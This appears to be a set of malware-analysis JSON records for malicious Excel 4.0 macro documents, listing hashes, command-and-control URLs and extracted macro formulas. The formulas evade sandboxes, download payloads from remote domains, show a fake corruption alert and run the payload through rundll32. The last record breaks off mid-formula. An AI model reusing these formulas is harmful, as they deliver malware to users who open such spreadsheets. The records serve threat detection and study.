{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d510545dbb51a349ef3f88f4b66050cfba76e02e8cb76e51bb66b12bd45a916"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d510545dbb51a349ef3f88f4b66050cfba76e02e8cb76e51bb66b12bd45a916","filesize":209920,"md5":"9b84b3751579f25b15975135c016e760","sha1":"1cace9f941dc05f1beacca97a793613a3c166370","sha256":"9d510545dbb51a349ef3f88f4b66050cfba76e02e8cb76e51bb66b12bd45a916","sha512":"a9a5b2fc1b44017840af2cabce951729d13d5830e7d3b86ce7c418a4c694a4ababbedc21781abd8840b608f658661eb5704f692c4d79e71e6ed68e8a4e33b6e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d510545dbb51a349ef3f88f4b66050cfba76e02e8cb76e51bb66b12bd45a916.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IOqmfccw00\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d55086ee2a34f477ec180fb6afacd30bf7d177f0e96a8e3d0760733553e8ef6"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d55086ee2a34f477ec180fb6afacd30bf7d177f0e96a8e3d0760733553e8ef6","filesize":167936,"md5":"b715c470c865975e5745d9595adc5b72","sha1":"33bb3d220538181b7c45789de632bbe2cb442416","sha256":"9d55086ee2a34f477ec180fb6afacd30bf7d177f0e96a8e3d0760733553e8ef6","sha512":"cf4526eb0db990cc89bba9df6c9282a20fc236001523f16f6e5610226a32fce4e496e6a0e344b7f924ae7d34d60a70f70c2e331e8ab2b072d0179004e122cfba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d55086ee2a34f477ec180fb6afacd30bf7d177f0e96a8e3d0760733553e8ef6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KK2od88PBk\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d5f328b6d6c87bee536b5c4c889041aeffcf37b56cb6042e8b4b1cb52dbf567"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d5f328b6d6c87bee536b5c4c889041aeffcf37b56cb6042e8b4b1cb52dbf567","filesize":160768,"md5":"f6d8dada372882b9aa3bf7a2a5ba9091","sha1":"cbdce97fe7767c9b39ff59fa7017c9f17ee66f51","sha256":"9d5f328b6d6c87bee536b5c4c889041aeffcf37b56cb6042e8b4b1cb52dbf567","sha512":"373345f204c27415a18d2112a1c940d658723644cbc10eac045a86da814277643e26af12828f4a9415ddac2dd71ab2e718cbaaf942e741a3c35443a5b985bcf8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d5f328b6d6c87bee536b5c4c889041aeffcf37b56cb6042e8b4b1cb52dbf567.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QWUiPZnj5W\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d7f001250e227e9769863e493c615e0d339dbac961e493596fae9d2d05955d9"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d7f001250e227e9769863e493c615e0d339dbac961e493596fae9d2d05955d9","filesize":167424,"md5":"4324a116470484b27031cf8026480da5","sha1":"07bb799ab34304285c741cf717e7dfcb92354f0f","sha256":"9d7f001250e227e9769863e493c615e0d339dbac961e493596fae9d2d05955d9","sha512":"4fa765794e8c269f049a438376639ec98cd8e7dcce2f5d37ad80982438e8cb595a91ed31c42bd9e62c97f7f14b9701d1c6af73fcb1a71350ea36f853dfc6b1a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d7f001250e227e9769863e493c615e0d339dbac961e493596fae9d2d05955d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"4uBlNod4Cd\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9dd5b0630a8631dcd008ef9453f65ea41ffdd626ecf1e3d1cb2e3fa2fa7b4a03"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9dd5b0630a8631dcd008ef9453f65ea41ffdd626ecf1e3d1cb2e3fa2fa7b4a03","filesize":167936,"md5":"c1049e9580998030aa9e22059b3ca9fd","sha1":"e4c20c2dcc2d5a73d432f0cbf55c76324a3e3056","sha256":"9dd5b0630a8631dcd008ef9453f65ea41ffdd626ecf1e3d1cb2e3fa2fa7b4a03","sha512":"3001db31c7794077cac4c3320207edd5803656d0734ae75239cf32da9057be625bfdf8784d58f2bfd5851624e37dd2f1311c66b4ecd90897ca934535d23e9e48","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9dd5b0630a8631dcd008ef9453f65ea41ffdd626ecf1e3d1cb2e3fa2fa7b4a03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"w8RkBTtrOt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9de52e50206e74b31344577fe4fbd4b302aaa86e379173a0ec89832c5ed02e15"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9de52e50206e74b31344577fe4fbd4b302aaa86e379173a0ec89832c5ed02e15","filesize":152576,"md5":"a0549533a34617ecf437bc2cc41591fb","sha1":"f8f2cb14546be5a0d5276046334117c55fe8b990","sha256":"9de52e50206e74b31344577fe4fbd4b302aaa86e379173a0ec89832c5ed02e15","sha512":"bc43b81ce8b2dca6c724c9ce60da889482ae8b7b2401390757806a075ef48182eb7b8321daeee884a29fd0edc01b2efd2f4e35940ebc1c54883de252240520c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9de52e50206e74b31344577fe4fbd4b302aaa86e379173a0ec89832c5ed02e15.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uLqwUS2bkO\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9df7d76bbe77e7fbeb92980154adc0fe8f7e949e020ac225024978e98411ea36"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9df7d76bbe77e7fbeb92980154adc0fe8f7e949e020ac225024978e98411ea36","filesize":116224,"md5":"28ac4ea04ba7b179f1c1fa9da179d696","sha1":"67e20f602351ea9a87fac3ab89dea12032579865","sha256":"9df7d76bbe77e7fbeb92980154adc0fe8f7e949e020ac225024978e98411ea36","sha512":"fb84fada25cbf33885d12884c515d6b12b8f24b32ebe189a1634ddf059abae5ceeeb64c2409b785a4c168ea52ba4375c3e652fffc8e06a7d41375186f23814e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9df7d76bbe77e7fbeb92980154adc0fe8f7e949e020ac225024978e98411ea36.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SVTTcDrm8a\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9df947a72e47676383d648858ee063c703a8f455454f1c6df8272a564a345cb5"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9df947a72e47676383d648858ee063c703a8f455454f1c6df8272a564a345cb5","filesize":167936,"md5":"82b796fdc9565b2dfde89ef9c28a6965","sha1":"4d9b1e631bd35c902441e18b826209c8b6a3a448","sha256":"9df947a72e47676383d648858ee063c703a8f455454f1c6df8272a564a345cb5","sha512":"a37590aff391df66b605c124e61c2a7eb8774adca27548521f4f24a7a2ab3aa81c4a1a6b2534935e44585aeedd0904dae6ed7ef4744401649ca78f3efd8adce6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9df947a72e47676383d648858ee063c703a8f455454f1c6df8272a564a345cb5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"I2veKTs39m\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e234c060376104fa1cefcbcac8df1f733642bd0a2cdb83bb737dec4aecdd200"},"analysis":{"reported":"2020-04-09T16:17:59Z","score":10},"files":[{"filename":"9e234c060376104fa1cefcbcac8df1f733642bd0a2cdb83bb737dec4aecdd200","filesize":167936,"md5":"3b8961a0fa164d08350217f77e0d70ab","sha1":"28f00216e8a267c86b963887bf7c8868fb3fdcfc","sha256":"9e234c060376104fa1cefcbcac8df1f733642bd0a2cdb83bb737dec4aecdd200","sha512":"e30a90096f92b76e8907d0f8c7b0f1dfde741fc70c6ce68e61a458e5efd2b1c1eb86fabed273019f8962c4d4fa0ec29a3655d41adff2081b8abb87fd2ddb5303","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e234c060376104fa1cefcbcac8df1f733642bd0a2cdb83bb737dec4aecdd200.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cfDZDUjhw1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e2897c7aa60a2d7afb10aee97a6d4a2409f8cdb9ec8176f31ee46cfc386eb8d"},"analysis":{"reported":"2020-04-09T16:17:59Z","score":10},"files":[{"filename":"9e2897c7aa60a2d7afb10aee97a6d4a2409f8cdb9ec8176f31ee46cfc386eb8d","filesize":167936,"md5":"1dc62476e30bff45724a4aad62e33b6a","sha1":"b41aafae9f329ffccccf2714c8687acc5f4408ea","sha256":"9e2897c7aa60a2d7afb10aee97a6d4a2409f8cdb9ec8176f31ee46cfc386eb8d","sha512":"3172505121b0e1478b238287a81aecef275b494c972017eb49b37749110338eb8e5c5474442053a6502c50f0c8d29100afd0ce6033cdb32809765bf69bd1422a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e2897c7aa60a2d7afb10aee97a6d4a2409f8cdb9ec8176f31ee46cfc386eb8d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"daI0A1OVds\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e424b2bd88b41f356461854ae2314d07b6015efc2c92b68bf24029852c4f9fe"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9e424b2bd88b41f356461854ae2314d07b6015efc2c92b68bf24029852c4f9fe","filesize":112640,"md5":"c72515bb5872c6760f60117f0d51a04f","sha1":"f43b2ba971c5849ceaa8c4b97bd9380f6a573484","sha256":"9e424b2bd88b41f356461854ae2314d07b6015efc2c92b68bf24029852c4f9fe","sha512":"76c28d55492aa95d98e6ef33c6d10ea802fe7144ab9a857dae361a383b9fc76115e6aba9e578bd3ddc35aca01f71e78f694471b6d00ef2c7b44812e3b41fdfc7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e424b2bd88b41f356461854ae2314d07b6015efc2c92b68bf24029852c4f9fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e5edda543358b7ead2614ff75e23d2c271cb917a89003fa8733d9d730950507"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9e5edda543358b7ead2614ff75e23d2c271cb917a89003fa8733d9d730950507","filesize":167936,"md5":"204228406aa193306acdea5672e76fbd","sha1":"45b091f5aa54c3dc55eabe20129b69e5a71cd15f","sha256":"9e5edda543358b7ead2614ff75e23d2c271cb917a89003fa8733d9d730950507","sha512":"83d743fb2190cc42f9df499a121a35f28dabb6ddebcb76c661505170bbca81b505c99bcb49bc725fbb93157936f67172a840d337c7382a2cdf4d54142e694734","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e5edda543358b7ead2614ff75e23d2c271cb917a89003fa8733d9d730950507.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b6gtC94JHv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e61760b2dad90b642fd0b20167bd16a4b407dc721ec1150d09b5abafa17884f"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9e61760b2dad90b642fd0b20167bd16a4b407dc721ec1150d09b5abafa17884f","filesize":167936,"md5":"7e8c951ad977d546e0dc0206c7214945","sha1":"0ca4378c00ee1e6b89853864c4914c58e0949c39","sha256":"9e61760b2dad90b642fd0b20167bd16a4b407dc721ec1150d09b5abafa17884f","sha512":"c89dfb6f2d0c74091b325f4276573487e03937130cb6bcb1d3666c0b29f3596bc24a16f05dabe88776d4e6231f0e0e6d135bfd8f8ab9ab66b92a46c6ee406996","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e61760b2dad90b642fd0b20167bd16a4b407dc721ec1150d09b5abafa17884f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XMshSrcgRx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e777e1e2e80909b5054c1eca935edc7046feb7d4546f40d392549e2f481d08e"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9e777e1e2e80909b5054c1eca935edc7046feb7d4546f40d392549e2f481d08e","filesize":112128,"md5":"1f38f17810621dbff93a4e8cbd2ea1bf","sha1":"bf5b0caf1cf36aa77ae4165739d0682562fb2843","sha256":"9e777e1e2e80909b5054c1eca935edc7046feb7d4546f40d392549e2f481d08e","sha512":"74c1a3a16222421dee1499d48cb990e2b10a29dc22b0c7e22057e8b0b975664d5d1da4a25678c148c2a989cb46b7192ffb34292a0367b869bf72f83a472b6d9b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e777e1e2e80909b5054c1eca935edc7046feb7d4546f40d392549e2f481d08e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9e96d42956002fe77882fb52e2eebb8f65604882833bcb636e9cbb9898cecaef"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9e96d42956002fe77882fb52e2eebb8f65604882833bcb636e9cbb9898cecaef","filesize":185344,"md5":"df992f69a0f201f40cadb8dcd5685f4a","sha1":"d5f4abb0aecb721bd5515afd49dbba1d0c95c696","sha256":"9e96d42956002fe77882fb52e2eebb8f65604882833bcb636e9cbb9898cecaef","sha512":"13819f7d04a021b528562dce728c45101113500437e36b2b99bc0f6fbd778e1c9e9ec658e44915a4041b9134e5d1c8207f6acb7a1c286ea2cbda09dca0ca4a2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9e96d42956002fe77882fb52e2eebb8f65604882833bcb636e9cbb9898cecaef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ea77e44e5dfd64fc7daa5862e16dcf2bfe49141c6a4f1e19ff89a5f61311a13"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9ea77e44e5dfd64fc7daa5862e16dcf2bfe49141c6a4f1e19ff89a5f61311a13","filesize":185344,"md5":"cbee5a464fd0141467d2b75602e9c8f7","sha1":"7450fd24bbdb8b0c7461fdfbd171d11143aff85b","sha256":"9ea77e44e5dfd64fc7daa5862e16dcf2bfe49141c6a4f1e19ff89a5f61311a13","sha512":"6039161fb4114bd7815e0e00871b7c0cf110011e7f4c10ace05a68592db924b5e065adf4c7a4538ea1cb9f228ec81335fe5a6e5b2505f38fb934883357636a02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ea77e44e5dfd64fc7daa5862e16dcf2bfe49141c6a4f1e19ff89a5f61311a13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9eaa838b8b65db1d085141568f18f67f2ea169ae506ca47278a03dfafa829754"},"analysis":{"reported":"2020-04-09T16:18:00Z","score":10},"files":[{"filename":"9eaa838b8b65db1d085141568f18f67f2ea169ae506ca47278a03dfafa829754","filesize":113664,"md5":"27d1cd1ae2d4dff196a5ca4ee2b38864","sha1":"dd3d522df007834d66ed07e5c3b0347b9ac70071","sha256":"9eaa838b8b65db1d085141568f18f67f2ea169ae506ca47278a03dfafa829754","sha512":"c0c9e1709e6b12c5e48d2ed16e1ddbe098512acab8c2fd1bae8c1699c8d95f3ecfe3be2356d951ae675eaf7d5082c54f358a6acbec48ea9d17bb3966c209257f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9eaa838b8b65db1d085141568f18f67f2ea169ae506ca47278a03dfafa829754.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is 